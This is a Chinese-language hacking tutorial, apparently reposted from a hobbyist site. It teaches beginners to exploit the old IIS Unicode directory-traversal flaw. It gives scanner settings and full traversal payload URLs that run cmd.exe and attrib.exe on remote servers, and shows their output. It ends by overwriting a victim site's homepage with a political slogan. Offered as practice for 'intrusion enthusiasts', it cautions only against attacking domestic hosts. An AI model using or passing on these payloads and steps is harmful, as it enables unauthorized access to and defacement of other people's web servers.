Unicode漏洞入侵图文讲解 -pc6资讯

您的位置：首页 → 网络冲浪 → 黑客天空 → Unicode漏洞入侵图文讲解

Unicode漏洞入侵图文讲解 时间：2010/1/18 11:57:00来源：本站整理作者：我要评论(0)

Unicode漏洞入侵图文讲解

Unicode漏洞可以说是目前最热门的漏洞了，关于Unicode漏洞原理的文章有很多了，我们初学者没有必要搞清除那些，通过本篇《Unicode漏洞入侵图文讲解》，先来看看具体的使用。

一、准备工具

　　Rangscan扫描器

　　这可是笔者扫描Unicode漏洞的必备工具

二、确定扫描范围和内容

　　　　运行Rangscan扫描器，可以看到如下界面：

　　　　　　　

　　如果要扫描Unicode漏洞有两处必须填入，一处是“扫描IP地址范围”，另一处是“扫描内容”。

　　在“扫描IP地址范围”中填入要扫描的IP范围，例如在“From:”栏中填入203.69.X.X，在“to:”中填入203.69.X.X即可。

在“扫描内容”栏中要填入：

第1种情况：如果要扫描中文Win2000的Unicode漏洞，则填入：/scripts/..%c1%1c../winnt/system32/cmd.exe

第2种情况：如果要扫描英文Win2000的Unicode漏洞，则填入：/scripts/..%c0%af../winnt/system32/cmd.exe

第3种情况：如果要扫描WinNT4的Unicode漏洞，则填入：/scripts/..%c1%9c../winnt/system32/cmd.exe

　　然后按“添加”按钮就把要扫描的内容添加进去了。填好扫描范围和扫描内容后，按屏幕下方的“扫描”键就开始扫描了。不要着急，要等上一段时间的。如果你所扫描的IP段有存在Unicode漏洞的主机，在软件中会有提示，并列出了存在漏洞的主机的IP

　　　　　　　　

三、进入目标主机

如果在IE浏览器的地址栏输入如下命令：http://203.69.X.X/scripts/..%255c..%255cwinnt/
system32/cmd.exe?/c+dir+c:\
就会看到类似下面的信息：

Directory of c:\
2001-06-11 03:47p 289 default.asp
2001-06-11 03:47p 289 default.htm
2001-03-09 04:35p DIR> Documents and Settings
2001-06-11 03:47p 289 index.asp
2001-06-11 03:47p 289 index.htm
2001-05-08 05:19a DIR> Inetpub
2001-05-19 10:37p DIR> MSSQL7
2001-03-09 04:22p DIR> Program Files
2001-05-23 06:21p DIR> WINNT
4 File(s) 1,156 bytes
5 Dir(s) 2,461,421,561 bytes free

这是已经看到目标主机的C盘根目录和文件了。

四、检查目标主机web页面文件存放位置

这时如果在IE浏览器的地址栏输入：

　　http://x.x.x.x/scripts/..%c0%af../winnt/system32/cmd.exe?/c+set ，一般情况下都会出现以下内容：

CGI Error 注：有此信息很正常，下同。
The specified CGI application misbehaved by not returning a complete set of HTTP headers. The headers it did return are:
ALLUSERSPROFILE=C:\Documents and Settings\All Users
CommonProgramFiles=C:\Program Files\Common Files
COMPUTERNAME=ON
ComSpec=C:\WINNT\system32\cmd.exe
CONTENT_LENGTH=0
GATEWAY_INTERFACE=CGI/1.1
HTTP_ACCEPT=image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
HTTP_ACCEPT_LANGUAGE=zh-cn
HTTP_CONNECTION=Keep-Alive
HTTP_HOST=x.x.x.x
HTTP_USER_AGENT=Mozilla/4.0 (compatible; MSIE 6.0b; Windows 98; Win 9x 4.90)
HTTP_ACCEPT_ENCODING=gzip, deflate
HTTPS=off
INSTANCE_ID=1
LOCAL_ADDR=x.x.x.x
NUMBER_OF_PROCESSORS=1
Os2LibPath=C:\WINNT\system32\os2\dll;
OS=Windows_NT
Path=C:\WINNT\system32;C:\WINNT;C:\WINNT\System32\Wbem;C:\MSSQL7\BINN
PATH_TRANSLATED=c:\inetpub\wwwroot
PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH
PROCESSOR_ARCHITECTURE=x86
PROCESSOR_IDENTIFIER=x86 Fa

　　现在，已看到目标主机的环境变量了，从中弄清楚主页文件所放路径，在本例中是放在c:\inetpub\wwwroot文件夹下。然后用命令：
http://x.x.x.x/scripts/..%c0%af../winnt/system32/cmd.exe?/
c+dir+c:\inetpub\wwwroot
就可以看到c:\inetpub\wwwroot文件夹下的文件了，这里一般会有default.asp，default.htm，index.asp， index.htm等文件，这些就是默认的主页文件，当然每台机器、每个管理员设置的都会有所不同，具体情况请具体分析。

五、判断是否有权

　　找到web页面所在目录后，就要判断一下是否有权修改对方网页文件。首先要确定文件是否可读写，用下面的命令来判断(假设主页文件所放路径为c:\inetpub\wwwroot\index.asp)：
http://x.x.x.x/scripts/..%c0%af../winnt/system32/attrib.exe?%20-r%20-h%20c:\inetpub\wwwroot\index.asp

1.如果出现下面英文：
CGI Error
The specified CGI application misbehaved by not returning a complete set of HTTP headers. The headers it did return are:
就是可以修改对方的网页了。

2.如果出现下面英文：
CGI Error
The specified CGI application misbehaved by not returning a complete set of HTTP headers. The headers it did return are:
Access denied - C:\inetpub\wwwroot\index.asp
说明权限不够，还是放弃吧。

六、修改目标主机的web文件

　　要修改目标主机的web文件，常用到的方法是利用echo回显以及管道工具“>”和“>>”。我们首先要确定文件是否可读写，我们用命令来试试：
http://x.x.x.x/scripts/..%c0%af../winnt/system32/cmd".exe?/c+echo+台湾是中国不可分割的一部分+> c:\inetpub\wwwroot\index.asp

当看到下面的提示时：
CGI Error
The specified CGI application misbehaved by not returning a complete
set of HTTP headers. The headers it did return are:

这就已经成功修改了目标主机的网页了！当在浏览器地址栏键入目标主机的网址，浏览该网站时，你会看到网页上有“台湾是中国不可分割的一部分”几个字，除此以外一片空白

　　　　　　　　　

当然你也可以把那几个字换成“您的网站有漏洞”，随你喜欢了！

　　没看懂？没关系，当初我也是看不明白类似的文章，但按文章上所说的去实践了以后，就慢慢的懂了——实践出真知！这话没错！当然，如果能做到理论与实践相结合那就更好了！要学习技术，理论联系实践是最好的方法和老师。最后，再次提醒各位入侵爱好者，一定不要入侵国内的主机，法律无情啊！

相关视频

没有数据

文章评论

查看所有0条评论>>

热门文章 黑客大战直播网址黑客